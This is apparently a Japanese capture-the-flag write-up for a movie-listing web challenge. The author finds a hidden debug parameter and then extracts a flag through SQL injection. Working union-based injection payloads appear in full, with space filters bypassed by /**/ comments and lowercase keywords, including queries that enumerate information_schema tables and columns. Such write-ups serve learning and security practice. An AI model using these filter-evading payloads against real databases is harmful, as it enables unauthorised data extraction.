Look at all these movie sequels that never got released! Will yours make it through??
Connect here:
http://jh2i.com:50008
映画のリストが取得できるサイトが与えられる。
ソースコードを見ると<!-- if ( isset($_GET["debug"])){ echo($sql_query); } -->
とあるので、とりあえず入れてみる。
/index.php?debug
に対してPOSTしてみると、Movie Nameとして入力したものがそのまま出てくる。
うーん、SSTI?色々試したけど、違いそう。
"
をやってみると、なんか出てくる。
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in /app/index.php on line 68
"#
で全部出てくる。
フィルター
- spaceは削除
- SELECT, FROMは消される(小文字は大丈夫っぽい)
ネットを探しまくって以下を通した。
"union(select/**/table_name/**/from`information_schema`.`tables`)#
flagというテーブルがある。
"union(select/**/column_name/**/from`information_schema`.`columns`)#
flagがあるので、flagカラムだろう。
"union/**/select/**/flag/**/from/**/flag#
これで出せる。
回り道したけど、普通に作って、space2commentでスペースを/**/にすればいいだけか。